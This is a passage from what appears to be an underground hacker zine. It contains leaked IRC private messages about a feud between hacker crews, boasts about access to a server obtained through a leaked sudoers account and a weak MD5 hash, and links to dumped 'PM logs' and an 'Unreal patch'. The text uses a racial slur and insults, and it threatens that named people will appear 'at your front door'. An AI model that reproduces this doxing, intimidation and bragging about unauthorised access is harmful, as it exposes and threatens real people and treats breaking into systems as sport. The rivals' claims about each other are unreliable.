bongrip PRIVMSG MLT :all the time +█ bongrip PRIVMSG MLT :i think hes talking about +█ bongrip PRIVMSG MLT :the official +█ bongrip PRIVMSG MLT :root +█ bongrip PRIVMSG MLT :like the one they allll call +█ bongrip PRIVMSG MLT :root +█ bongrip PRIVMSG MLT :el8 there was this guy they called root +█ bongrip PRIVMSG MLT :that was above all of them +█ MLT PRIVMSG bongrip :ah +█ bongrip PRIVMSG MLT :and wasnt el8 +█ bongrip PRIVMSG MLT :he was for hire +█ bongrip PRIVMSG MLT :so someone apparently has gotten this guy +█ bongrip PRIVMSG MLT :some money +█ bongrip PRIVMSG MLT :to do shit to us +█ bongrip PRIVMSG MLT :so like +█ bongrip PRIVMSG MLT :dont tcpdump +█ +█ anyway, yall suck cock. stop posturing as real old school +█ hackers. it's getting old. especially people like MLT who go +█ "I KNOW AC1DB1TCH3Z!!!!" for attn. yall niggas dunno shit. +█ +█ <@YogSotho> In my experience, russians are 31337 +█ +█ he told me he had the box completely locked down and that everything +█ was secured +█ lola said he had the box secured +█ +█ kinda makes ya feel like a user/pass mighta been dropped +█ by lola +█ via a btc +█ or 2 +█ np +█ +█ MLT: it was passed on credentials +█ scraped some shit and found it, sxcurity :\ +█ they didnt hack anything +█ sxcurity gave them his sudoers account +█ they got mine out of there and the rest is just... +█ i mean lol +█ weakest unix bowlers +█ u know what +█ im not even gonna change something +█ im gonna leave it as is with them having access to lolas box +█ if they can crack that weak ass md5 hash +█ and oper up on my accnt +█ ill give it to ya +█ bongrip I did what? +█ @ bongrip ? +█ +█ @ret2libc: Well we just had a lengthly convo with green about how you and +█ some others from 2600 paid him $$$ to try own us. Damn you must +█ be desperate. +█ +█ and green +█ lol +█ rip +█ to him +█ and his entire future +█ +█ r u actually zf0 +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x09 Attachments ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ [+] PM logs +█ https://mega.nz/#!gSoxFYjB!WSi7Fj2WPbN-MoGVv48qb7cY1AaiCvOtBnQTcWpy2Ac +█ [+] Unreal patch +█ https://mega.nz/#!wCIQ2bgY!67spwHp9nd1g6sbUbuWUcxplcrIYtSOzo5lfd9QTuYs +█ +█ spread my pm's again and aush0k+kms+zeekill+me at your front door +█ +███████████████████████████████████████████████████████████████████████████████ +█████████░ +██▀▀▀▀▀█▀ +█ ▄█▀█▄ ▄███▄ ▐█ ▐█▌▐████▌ ▄██▄ ▄█▀█▄ ▐████▌ +█ ██ ██ ██ ██ ▐██▐█▌ ██ ████ ██ ██ ██ +█ ██ ██ ██ ▐████▌ ██ ▐██▐█▌ ██ ██ +█ ██ ██ ██ ██ ▐█▌██▌ ██ ▐█████ ██ ██ ██ +█ ▀█▄█▀ ▀███▀ ▐█▌ █▌ ██ ██▌ ██ ▀█▄█▀ ██ +██▄▄▄▄▄█▄ +█████████ +█████████ Please contact us directly through the FSB +█████████ +█████████ +███▀▀▀▀▐▀ +██ ▄█▀█▄ ████▄ ▄███ ▄███▐████▌██ ▐█ ▐█▌ ▄█▀█▄ ▄███ +█▌▐██ ██ ██▌██▌██ ██ ██ ██ ▐██▐█▌▐██ ██ ██▄▄▄ +█▌▐█▌▄▄▄ ████▀ ███ ███ ██ ██ ▐████▌▐█▌▄▄▄ ▄▄ ██ +█▌▐█▌ ██ ██▌██ ██ ██ ██ ██ ▐█▌██▌▐█▌ ██ ██ ██ +██ ▀█▄██ ██▌▐█▌▀███ ▀███ ██ ██ ▐█▌ █▌ ▀█▄██ ▀███▀ +███▄▄▄▄▄▄ +█████████ The OFFICIAL root +█████████ Green +█████████ danK +█████████ +█████████ +█████████ +█████████ ░░ +█████████ ░░░░ +█████████ ░░░░░░ +█████████ █▄ ░░░░░░░░ +████████████████████▄ ░░░░░░░░ +██████████████████████▄ ░░░░░░░ +██████████████████████▀ ░░░░░░░ @ MLT: We're borrowing +████████████████████▀ ░░░ ░░░░░░ your verified checkmark to + █▀ ░░░░░░ ░░░░░░ verify the authenticity of + ░░░░░░░░ ░░░░░░ this zine. ;) + ░░░░░░░░ ░░░░░░ + ░░░░░░░░░░░░░ + ░░░░░░░░░░ + ░░░░░░░ \ No newline at end of file